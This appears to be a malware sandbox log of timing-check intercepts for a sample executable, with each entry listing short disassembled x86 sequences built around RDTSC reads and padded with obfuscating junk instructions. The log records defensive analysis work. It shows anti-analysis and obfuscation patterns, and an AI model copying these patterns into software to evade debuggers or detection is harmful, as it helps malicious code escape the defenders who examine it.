Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FE2F7 second address: 11FDB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a sbb edx, 1121E984h 0x00000010 mov dword ptr [ebp+122D2A87h], ebx 0x00000016 popad 0x00000017 push dword ptr [ebp+122D01A5h] 0x0000001d pushad 0x0000001e mov edi, 24A4AE9Eh 0x00000023 mov cx, di 0x00000026 popad 0x00000027 call dword ptr [ebp+122D22DDh] 0x0000002d pushad 0x0000002e jmp 00007F0F04CBD323h 0x00000033 xor eax, eax 0x00000035 jng 00007F0F04CBD325h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f js 00007F0F04CBD31Ch 0x00000045 xor dword ptr [ebp+122D2ACAh], edx 0x0000004b mov dword ptr [ebp+122D3820h], eax 0x00000051 jmp 00007F0F04CBD31Dh 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007F0F04CBD327h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 xor dword ptr [ebp+122D1875h], edi 0x0000006a lodsw 0x0000006c sub dword ptr [ebp+122D1875h], esi 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 cld 0x00000077 cmc 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c jnl 00007F0F04CBD322h 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FDB3C second address: 11FDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137CBCF second address: 137CBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BAFF second address: 137BB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB03 second address: 137BB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BB1E second address: 137BB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC8F second address: 137BC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC95 second address: 137BC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BC9B second address: 137BCA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BCA7 second address: 137BCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137BE12 second address: 137BE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push esi 0x00000008 jmp 00007F0F04CBD328h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C256 second address: 137C265 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C265 second address: 137C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137C26B second address: 137C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DFA3 second address: 137DFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137DFB1 second address: 137E01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3E88A8FCh 0x00000012 mov dword ptr [ebp+122D234Dh], edi 0x00000018 push 00000003h 0x0000001a mov ch, al 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F0F0527E408h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F0F0527E415h 0x0000003d push 00000003h 0x0000003f mov si, A873h 0x00000043 push ABB3C9A3h 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E01D second address: 137E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 6BB3C9A3h 0x0000000d mov dword ptr [ebp+122D21E9h], ebx 0x00000013 lea ebx, dword ptr [ebp+12453E1Ah] 0x00000019 pushad 0x0000001a xor ah, 00000047h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 js 00007F0F04CBD316h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0C0 second address: 137E0DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0DA second address: 137E0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0DF second address: 137E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E0F1 second address: 137E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F04CBD318h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3898h] 0x00000029 xor dx, E5B2h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c push A02F51E2h 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0F04CBD31Ah 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E15D second address: 137E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 5FD0AE9Eh 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2AC3h], edx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2E07h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F0F0527E408h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov si, 2B17h 0x00000041 mov di, si 0x00000044 push A07DFA96h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E1B7 second address: 137E1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E29A second address: 137E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E2AE second address: 137E322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D3780h] 0x00000012 and edi, dword ptr [ebp+122D21E9h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov edx, dword ptr [ebp+122D38A4h] 0x00000022 pop edi 0x00000023 push 7B65ECA4h 0x00000028 push esi 0x00000029 jnc 00007F0F04CBD318h 0x0000002f pop esi 0x00000030 xor dword ptr [esp], 7B65EC24h 0x00000037 jmp 00007F0F04CBD325h 0x0000003c xor edi, dword ptr [ebp+122D3A58h] 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D384Ch] 0x0000004a push 00000000h 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D379Ch] 0x00000054 call 00007F0F04CBD319h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E322 second address: 137E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137E329 second address: 137E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F04CBD31Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0F04CBD31Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0F04CBD322h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F0F04CBD329h 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 mov dword ptr [ebp+122D2B3Ah], edx 0x00000037 lea ebx, dword ptr [ebp+12453E2Eh] 0x0000003d xor dword ptr [ebp+122D2A5Ch], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0F04CBD31Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1390661 second address: 1390665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139F198 second address: 139F1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F04CBD328h 0x0000000e jnp 00007F0F04CBD318h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edi 0x00000017 jo 00007F0F04CBD316h 0x0000001d pop edi 0x0000001e popad 0x0000001f push ecx 0x00000020 jmp 00007F0F04CBD324h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139D7FE second address: 139D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139D804 second address: 139D808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DBCF second address: 139DBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DD94 second address: 139DDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DDA8 second address: 139DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139DDAE second address: 139DDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E065 second address: 139E089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E418h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E089 second address: 139E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1396515 second address: 1396519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13714B4 second address: 13714BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E33F second address: 139E353 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F0527E40Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E353 second address: 139E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E914 second address: 139E91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E91A second address: 139E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E921 second address: 139E93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F0527E411h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E93E second address: 139E948 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC11 second address: 139EC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC19 second address: 139EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC1F second address: 139EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139ED6D second address: 139ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0F04CBD325h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F0F04CBD316h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F04CBD31Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A25E9 second address: 13A25ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1368DB0 second address: 1368DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1374D0B second address: 1374D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AB8E8 second address: 13AB902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F04CBD324h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AB902 second address: 13AB906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ABBF8 second address: 13ABC2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 je 00007F0F04CBD316h 0x00000016 jmp 00007F0F04CBD31Ah 0x0000001b jl 00007F0F04CBD316h 0x00000021 popad 0x00000022 jmp 00007F0F04CBD31Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ABEE6 second address: 13ABEEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1BA second address: 13AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1BE second address: 13AC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1C6 second address: 13AC204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0F04CBD316h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F0F04CBD31Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0F04CBD31Ch 0x0000001a jmp 00007F0F04CBD326h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC204 second address: 13AC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0F0527E406h 0x00000009 jnc 00007F0F0527E406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD7ED second address: 13AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD7F3 second address: 13AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADD4A second address: 13ADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADE1E second address: 13ADE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADEE6 second address: 13ADEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADEEE second address: 13ADF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F0527E40Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1A4 second address: 13AE1AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1AE second address: 13AE1B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F0527E40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1B8 second address: 13AE1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0F04CBD316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1C8 second address: 13AE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE299 second address: 13AE29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE371 second address: 13AE376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE99C second address: 13AE9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9A0 second address: 13AE9B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9B2 second address: 13AE9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9B6 second address: 13AEA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0F0527E408h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D37D4h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2ABEh], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0F0527E408h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3394h], ecx 0x00000052 sub dword ptr [ebp+122D2AE5h], edx 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a jo 00007F0F0527E40Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AEA21 second address: 13AEA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B12BD second address: 13B1364 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F0F0527E408h 0x00000010 popad 0x00000011 nop 0x00000012 adc edi, 4C01FE11h 0x00000018 push esi 0x00000019 mov edi, dword ptr [ebp+122D1F9Ah] 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0F0527E408h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c call 00007F0F0527E40Bh 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F0F0527E408h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 77939EEFh 0x00000063 mov si, DEFDh 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F0F0527E411h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F0F0527E40Dh 0x00000077 rdtsc
